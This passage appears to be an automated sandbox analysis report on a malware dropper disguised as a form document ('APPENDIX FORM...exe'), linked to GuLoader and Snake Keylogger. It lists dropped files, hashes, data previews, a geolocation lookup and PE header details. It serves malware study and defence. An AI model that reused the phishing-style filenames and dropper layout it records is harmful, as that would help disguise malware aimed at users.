                                                                                                      RFQ-PRECISE PO #2798106_PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                                        Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          Revised PI_2024.exeGet hashmaliciousGuLoaderBrowse

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\Public\Pictures\pediculofrontal.lnk

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                            Category:dropped
                                                                                                            Size (bytes):893
                                                                                                            Entropy (8bit):2.936301410587607
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:8wl0Oi/kdvrHj4/3BVwzyDilfObBW+sljm3kXg1MJ8N0HRqTM:8izD4/B4K/wm3oDRp
                                                                                                            MD5:DA633DA19A98DD95BCB5F9E953522B64
                                                                                                            SHA1:B8DB75E73A1B206CB1C857323BAB7A33930E18AF
                                                                                                            SHA-256:30D66E8AAAD4B7E644E4D6E0163B858ED9CAA15687425FC0C45D1937B46C0CDE
                                                                                                            SHA-512:26993ECAA0D27E9622ED134C556B9EB4AAC2B862736F6F941FDE5B6CFA6018E709715108D53C712375FDC3B018B8F39E071FCB6523488E3F914CE0E5966D7E7B
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................b.1...........ProgramData.H............................................P.r.o.g.r.a.m.D.a.t.a.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....\.1...........Templates.D............................................T.e.m.p.l.a.t.e.s.....b.2...........jeblets.Bul.H............................................j.e.b.l.e.t.s...B.u.l.......<.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.j.e.b.l.e.t.s...B.u.l.W.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.O.r.k.e.s.t.r.a.l.\.V.a.g.i.n.o.v.e.s.i.c.a.l.4.1.\.b.i.o.g.e.o.c.h.e.m.i.s.t.r.y.\.b.e.v.b.n.i.n.g.e.n.....

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):962
                                                                                                            Entropy (8bit):5.015105568788186
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                            MD5:8937B63DC0B37E949F38E7874886D999
                                                                                                            SHA1:62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
                                                                                                            SHA-256:AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
                                                                                                            SHA-512:077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                            C:\Users\user\AppData\Local\Temp\bhv2DCB.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc350c1bd, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):14680064
                                                                                                            Entropy (8bit):0.9773417578112378
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:YgMnQEUUMBPPpBPJmNjfiEWC7WswQpWK/qZCCkxpu514dCVZ3L9yqXx4SU8GxJHL:5n/cj5tND5ApBK4K
                                                                                                            MD5:E211FD8DD8F5B0129909077F090780B4
                                                                                                            SHA1:01551769117DAA5A65350A26D750658556E84775
                                                                                                            SHA-256:57D57E3D7084FC39D1A430D7E4F02EE564EF93D088791B718A8AD00D6CFAABCC
                                                                                                            SHA-512:D029672E2C1E7D448540350EA18FCEBBB5C109584E88FD4B3EA809F5390B98DBE423EEB0DA03F79BC348252B3CB57A8693E6C6C6CA73DEF55EB6ECD8007B64BF
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:.P..... ................./..(...{........................&.....'6...{.......|..h.(.........................:.I..(...{..............................................................................................P...........eJ......n........................................................................................................... .......93...{a..............................................................................................................................................................................................(...{...........................................|...................~.u.....|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\hhicqmxmcuubmwccmnspqit

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):2
                                                                                                            Entropy (8bit):1.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Qn:Qn
                                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:..

                                                                                                            C:\Users\user\AppData\Local\Temp\nsc44A6.tmp\System.dll

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:modified
                                                                                                            Size (bytes):11264
                                                                                                            Entropy (8bit):5.76003797720627
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:jVL7iZJX76BiqsO7+UZEw+RlthVEoC0O3XB:g7ssOpZs/hS3X
                                                                                                            MD5:960A5C48E25CF2BCA332E74E11D825C9
                                                                                                            SHA1:DA35C6816ACE5DAF4C6C1D57B93B09A82ECDC876
                                                                                                            SHA-256:484F8E9F194ED9016274EF3672B2C52ED5F574FB71D3884EDF3C222B758A75A2
                                                                                                            SHA-512:CC450179E2D0D56AEE2CCF8163D3882978C4E9C1AA3D3A95875FE9BA9831E07DDFD377111DC67F801FA53B6F468A418F086F1DE7C71E0A5B634E1AE2A67CD3DA
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: OFFER KH-20241024.exe, Detection: malicious, Browse
                                                                                                            • Filename: OFFER KH-20241024.exe, Detection: malicious, Browse
                                                                                                            • Filename: Belialist.exe, Detection: malicious, Browse
                                                                                                            • Filename: WnsTnPaieH.exe, Detection: malicious, Browse
                                                                                                            • Filename: WnsTnPaieH.exe, Detection: malicious, Browse
                                                                                                            • Filename: LisectAVT_2403002B_95.exe, Detection: malicious, Browse
                                                                                                            • Filename: RFQ-PRECISE PO #2798106_PDF.exe, Detection: malicious, Browse
                                                                                                            • Filename: RFQ-PRECISE PO #2798106_PDF.exe, Detection: malicious, Browse
                                                                                                            • Filename: Revised PI_2024.exe, Detection: malicious, Browse
                                                                                                            • Filename: Revised PI_2024.exe, Detection: malicious, Browse
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....f.R...........!................+'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...o........................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..J....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\nse3C39.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2754450
                                                                                                            Entropy (8bit):2.763327921798719
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:ZcPmkqOoXkqsMNFCR/K9Y96MBP6gFXjHltwSO:6uHkqBNFB8mSO
                                                                                                            MD5:7B398928CCED4A3135684B1E41DF7418
                                                                                                            SHA1:525FF70F19B38AB7D21A479E02924F418B3F6397
                                                                                                            SHA-256:45B1FCBB27506DAD920EC4112ED755963FB4B92A2EA0CEDA416104EBED25717A
                                                                                                            SHA-512:20BB50AA8D89D1951B7A29DF125D089355782E481694B31A897D7D290782757C3D91BEB818E74749B5F41FFC89C71EDBFC591A46ED95901F521814A764CE8360
                                                                                                            Malicious:false
                                                                                                            Preview:.G......,...................n....1.......F.......G..........................................................................................................................................................................................................................................J...x...............j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\Belgians.txt

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):557
                                                                                                            Entropy (8bit):4.197322697341542
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:PbM4addO1mhuJESFoo7QVZAy8WKeVLwMXTRIyZOBLOLpEgIaJjM5C4A6Oa:1yuKloMI7WKeLrXdI8OxO6kO
                                                                                                            MD5:434C299BF0F32D2C335F68A2C810E905
                                                                                                            SHA1:536A77F641BBAB16B3A2E9E47840E98092678959
                                                                                                            SHA-256:37F30AC7357896F124ABA52018116ED9789F57B3AA7AE596D9C9EBC09E28C8F8
                                                                                                            SHA-512:D95055A0260DEE2BC209E2B06D55D1BB4F5B4F5317FA36DA9603BFF61D43C28119C4C380B890BF4FCDD61B18EEC0EC2AFC3F5A1349B68EEA9C9E9DE4D848ABD0
                                                                                                            Malicious:false
                                                                                                            Preview:gingered ablatitious regredierer forfatningsraad unperplex philonatural gennemhegl toholdsskift foragter garantibetalingernes dissertations lreanstalterne unsereneness..fagus satinpwr fiscals udsorteringers reimpel.taffelmusik socialdemokratismens gyrene fjordmundingens tilkbsbilletters fyringssedlens hutlende uninfixed unpedestal trisulc apolog..pli neurolytic klabautermandens sammenkdningen smrrebrdsseddel fustigations dgninstitution.rumvgtenes ansttelsestiden statuslinjers shoppen yuri morskabslsningers,instore mennonist smugryges inkhorns fjerdes,

                                                                                                            C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\Hokerer118.Syl

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):433906
                                                                                                            Entropy (8bit):2.6471516444077823
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:sMEjsYO+ZwRA2UP/+rcU6lL3GKMTcP0q01WkVvPKh3k+K2lNWKP7zfn5k7Ui4uLe:wHR/SJ9YqvsH76MBTLwrgXVRBM9qJ
                                                                                                            MD5:6B82BFD87DAB351ADA3FD5DFA679A6D3
                                                                                                            SHA1:796A6B68832A8623836DD3B8A772B55D76524D87
                                                                                                            SHA-256:4CDC88E916FD12037F14C7D4A0D8D35CBD3CB86EB1D3E5A92F15B1EA04F5A1A1
                                                                                                            SHA-512:32AFEC2DBFAE3DE66FE0DDE49AAF6BE48DD84429F74065D9B0DDBF31F23001E2D92F00BB0163216DAB7EEF83B15224B9F219F43BDE9B77741C210D593774E1C4
                                                                                                            Malicious:false
                                                                                                            Preview:002E2E2E000000000000004000868600007373730000F0009D00000000000000F6000000000000008787009898989800005A000000EBEBEB00004A0000A8006400003E3E000096969696006B6B6B0007007676000000F2F20000000B00009F9F9F00BABABABABA00000000F3F3F3F30000000C00BF0000DC00000000EAEA00F900004242424242420000BC000000000000CC00005C00004242424200000000242400E3E3E30033333300007200FBFBFBFBFB00B4000000000000009A9A9A00757500240000A4A4A400003D3D3D3D3D3D3D3D3D006B00003F0000000017171700009E008181810000EFEFEFEF00008787870099005200000000F9F9F9F90000EA00BD000074747400100000989800003C3C00B1000000B1B100008787878700A8A8A8A80000000055000000898989898989008B8B8B8B8B8B8B0000080000000000000000C400009900CCCC000000D8D80000AE0062006E6E0000006B00000000D5D5000000000808000000000000E2000000000000000000001E1E000000003A00002E00000B0000F7F700430000009F9F000000640073000000120000006E000000BB000000C3C30003000000D2D2D200CBCB0000009A9A9A0000F5003500000000000101006D6D005151000070001D0019006E001A1A007E0000004B00009E005B5B5B5B00AD0000E100C1001C0000008600F6

                                                                                                            C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\Kontinuiteterne.Aut

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):211862
                                                                                                            Entropy (8bit):7.538594537719835
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:6bvWNP1oiSnUjbalQX7cCGNQCcugYSsj2qiknkD3OJYKJ93x3VGcMyqF:svkP1oiSUqOX4XcuqNqvkD3ZKNF2
                                                                                                            MD5:613352ABF113D950208409A1311076F6
                                                                                                            SHA1:70A9380D25CB694F30A0CFB8B6C9482EDDC70258
                                                                                                            SHA-256:94783C7BAECF05C33F714D59402203986F4D7E6046AE1200EA3F6E6A1DF6F220
                                                                                                            SHA-512:E374D791853647FA08D9A1719E453F9FF9555BD5562A8DC8A5BB20EE810F43EE10B6A90C6689A15E47A78E5E894A72CD0B0918A4A0F4F1354F45DEDD987E0603
                                                                                                            Malicious:false
                                                                                                            Preview:........*..........D..................dd.o.....MMM.......||||........$$.A...............--...vv.K..................PP......11.................ZZ...........".......................EEEE...............................EE......22..................................M.A...........................mmmm.ttt.......g.....EE..l.^^..|..........................gg..........'......................N...........&..C.....aaa.X.F........66666............d....Z.ii...<<<<.......''''.....................<........~..~~........................kk..9999...~~~~~........###...........................a....................Z.....7.u.........OO.11.2...........L............................VV..CCC...........YYYYYY...UUU......-.....FF...;;;.rr...............[.//........J............. ...zz...........................P../.....QQ.\\\\.>....X.d.VV....S....................v.?...........A.^....................................................###........44........{{...99............................zzzzzz..''''.....f...............

                                                                                                            C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\Nytaarsforst98.ret

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):392055
                                                                                                            Entropy (8bit):1.2526489998571093
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:uTCaMstHH+6np+6BwgRZJUxd5i8Rl24uNKn9VaUdrruMBUTXA9esA/1wb1Hhca9q:uGax6CMtRTvhpMwt4rk3f3jf25oXuf
                                                                                                            MD5:ED7C57BA1529F8D13732CC6B99721FB7
                                                                                                            SHA1:8F6FFB5E3920D6A672C3936FD3A370632C11546A
                                                                                                            SHA-256:364E19ECA1F5E914EC18248BBE50AD3DAD1D2BB15764233DB86264CE55554D99
                                                                                                            SHA-512:8C107D84EB8B93351149943B0435EB6643BADA0434189BD949BCD32CD15918B9BA75653D65DA8FA7EA845AE7C197E2DD43CCBE25A2629D4DFB925C6E473BA073
                                                                                                            Malicious:false
                                                                                                            Preview:.n.........t..............................................T.................................................................?................................................................................................G.....................................................^....7........[.....B..............................................................................%......................................................%....................................K.................y....9..........~............................3.....................W....!..................................................N....2....................................]................W...................................................................T................................@..M......................................B...........................................!.........................................................................................................._.............. ......................

                                                                                                            C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen\fgterens.bet

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):499341
                                                                                                            Entropy (8bit):1.257602995058174
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:71AAor4xonXRCx0qoKFK2JhNtFiw4VU4fkYqW0R/XRGbx4XcV1v:GAnxoXsxzH9PSRR
                                                                                                            MD5:0F6E4F4F20252DB6C5504BA0799DCA3E
                                                                                                            SHA1:3313120B60060D64E127886547F7A94587539B59
                                                                                                            SHA-256:6994ECBE245DEE5A42F4CD6AE12256DFA2022DB5AE9B9B670C0C1D48C1FC7077
                                                                                                            SHA-512:F0FF5D7EC15978F0DB2E6EB91017934C7ADBF4DF41DC3EA0F815D56C938A0C080254A146C23BBB7C01A5262B87646DD0DA5DE501D8AA259709DA98C34591D5EE
                                                                                                            Malicious:false
                                                                                                            Preview:...................................................\..........................................Q......................)......=...........W......m..o......................................Z........!..................:.........K........................................................................................Q......k......................................!......................;.............o......b..................m..........................z.......v...............W.............................7.....................................................................................`.........................................=.............................,...............c........................................................a.@.....................~.....................................................................o...................................................................................G.........M.*.......j........S.............A.................v...........................

                                                                                                            C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen\kilogram.fla

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):499358
                                                                                                            Entropy (8bit):1.2605028775808527
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:B1R9JwZYA101R2LWExs5j7RNzaNUP8rweI/V1Ss:HSg2LUPxb
                                                                                                            MD5:53FF5B5504F5367EB38A0957993B4947
                                                                                                            SHA1:BC495C3035BC47B4E9881721955FB2B8E531CC17
                                                                                                            SHA-256:31D0CA93FCF41326A2C67AC1D5399B909EEBF03867D86745194881D4FBC5AAEF
                                                                                                            SHA-512:A31FDB628CA38830ECD7AF143CE82F52D91D6930EE7A388A4495ED90B471FC0349D2493C33AC6700D09B61855514D162E612C0DBB60AD4006921368908E36976
                                                                                                            Malicious:false
                                                                                                            Preview:......N..........5................................................................k...........................................................................................q..~...............A.......................................&..........................`...................................O..........E................................. .........i.....;......................................................................................................................................;.s...............................................................[.............4z...................................................................v...............................................;....................................................................O.................S....................................................o.......N...................................................................................h.............................d.........................2......................

                                                                                                            C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen\udfrselstilladelser.elm

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):357199
                                                                                                            Entropy (8bit):1.2489198861145303
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:EVIsFuI5buRa/yx8HTjevJtWy6hRD4GGgIZF+dDe5KD21HgA5dMOwaegt5Q3N4Z9:uhN7qNd/3foUkBzEeCGRKF
                                                                                                            MD5:ADA17684B51AC6E18BE17CB5EE4A6C9F
                                                                                                            SHA1:3BD970BD6D87494AA55E4C8A536E0FC098D2AFB4
                                                                                                            SHA-256:38E7A754D867BFC91C202DCF6396E02CB6D3F42F568ACE3E0C33567342539333
                                                                                                            SHA-512:73480F99FBF2551B9C673614CF6048F2CCCBCD361701B7DEDE26279C5ED7DF52514461931F303F7304FBF1EAF1A61FE5D1FEBDDD251104AA4527DB68EEB54BE7
                                                                                                            Malicious:false
                                                                                                            Preview:............................................................6..................................................................D.............8............................................d........c........................>.....................{..................q.............................?...................................................................0..x.......S.j...........R.........................:.............U..................................0.......................................................................................................................J............&..........................I.....h......................................................................@.....L......................................o......................................;........Y........................"..................................j................p.......J/............x.......................4...%..................................................................................

                                                                                                            C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen\unwelcomed.mar

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):330434
                                                                                                            Entropy (8bit):1.2465006888742005
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:mPe712kYmEFBOfQxtXM9NQ105AvipCJvjgO1mIyC+XL/wHMqkz3uheycYf2vKzZv:iXOs6QlMkA7KzZ7XIUy67q3q
                                                                                                            MD5:FBAC61CC2070488CFD0ECD5EE323F42D
                                                                                                            SHA1:FC9AEBD5CA7B740AB1CB22B4B0630DA10F1ED2B3
                                                                                                            SHA-256:8AEBDA149767FEC02BF703ED200F14CA41B9461E1FB362D6DFD86AFCD4222DA4
                                                                                                            SHA-512:64C36FFB07804F82118FF42F063EE124EC423A14D78DD9C6D717AD553B9004948AE7552BDBCE164463458A1B58B5EEE22ACB0664A1318725167B3985DA5AEC9B
                                                                                                            Malicious:false
                                                                                                            Preview:...T..........................................................N......................O...........................0.........................................R..........................8................C.......t......................................................c..........................................j...................................................9....................v..N.......................................................................................................................................................q.........Q......................................H............K....<................@...........8.........^..........................................................3...........H..................................................`P........................................*F..........N..............h.......................................................|..e................O............W.................r..............................................................

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                            Entropy (8bit):7.975036130437581
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File size:697'930 bytes
                                                                                                            MD5:cf4530628bdb401e066ea81e86403d77
                                                                                                            SHA1:b929d4f89e537b8f932bebc75df0959ef9b406ee
                                                                                                            SHA256:e721952c765bb39555f2aa9f2141649fe2c1f2700224513c2860c8a7e25d2260
                                                                                                            SHA512:ab29e221be8b0b8318ebcd97d638034bf80368221713e15b3b016a0aa42f2f142c2ce2de68d3eb8a99a6d65e43a6268ea1a4db0f7436f6bcc5ff0e222c691d4a
                                                                                                            SSDEEP:12288:+3vFfP1t7YQ6RTw6F+i4nGxcigHvPyagJQMzoocD/f9Lw:A1r7YQ9lcc9Hv0QMzoZpw
                                                                                                            TLSH:9BE423111DD468EEF15799702437EA72F369EC211F40655AAB803FF2EC39E93C82568A
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........2.......p....@

                                                                                                            File Icon

                                                                                                            Icon Hash:326e7b795c770747

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x403219
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x52BA66AF [Wed Dec 25 05:01:35 2013 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            sub esp, 00000184h
                                                                                                            push ebx
                                                                                                            push ebp
                                                                                                            push esi
                                                                                                            xor ebx, ebx
                                                                                                            push edi
                                                                                                            mov dword ptr [esp+18h], ebx
                                                                                                            mov dword ptr [esp+10h], 00409130h
                                                                                                            mov dword ptr [esp+20h], ebx
                                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                                            call dword ptr [00407034h]
                                                                                                            push 00008001h
                                                                                                            call dword ptr [004070B4h]
                                                                                                            push ebx
                                                                                                            call dword ptr [0040728Ch]
                                                                                                            push 00000008h
                                                                                                            mov dword ptr [00423798h], eax
                                                                                                            call 00007FBF6CD52E62h
                                                                                                            mov dword ptr [004236E4h], eax
                                                                                                            push ebx
                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                            push 00000160h
                                                                                                            push eax
                                                                                                            push ebx
                                                                                                            push 0041ECA0h
                                                                                                            call dword ptr [00407164h]
                                                                                                            push 004091E4h
                                                                                                            push 00422EE0h
                                                                                                            call 00007FBF6CD52B0Ch
                                                                                                            call dword ptr [004070B0h]
                                                                                                            mov ebp, 00429000h
                                                                                                            push eax
                                                                                                            push ebp
                                                                                                            call 00007FBF6CD52AFAh
                                                                                                            push ebx
                                                                                                            call dword ptr [00407118h]
                                                                                                            cmp byte ptr [00429000h], 00000022h
                                                                                                            mov dword ptr [004236E0h], eax
                                                                                                            mov eax, ebp
                                                                                                            jne 00007FBF6CD500BCh
                                                                                                            mov byte ptr [esp+14h], 00000022h
                                                                                                            mov eax, 00429001h
                                                                                                            push dword ptr [esp+14h]
                                                                                                            push eax
                                                                                                            call 00007FBF6CD5258Ah
                                                                                                            push eax
                                                                                                            call dword ptr [00407220h]
                                                                                                            mov dword ptr [esp+1Ch], eax
                                                                                                            jmp 00007FBF6CD50175h
                                                                                                            cmp cl, 00000020h
                                                                                                            jne 00007FBF6CD500B8h
                                                                                                            inc eax
                                                                                                            cmp byte ptr [eax], 00000020h
                                                                                                            je 00007FBF6CD500ACh

                                                                                                            Rich Headers

                                                                                                            Programming Language:
                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000x33e8.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x5be40x5c00a9339c1bdb66abf46dde2cd3394ff34aFalse0.6697944972826086data6.480161249709841IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x70000x11ce0x12005801d712ecba58aa87d1e7d1aa24f3aaFalse0.4522569444444444OpenPGP Secret Key5.236122428806677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
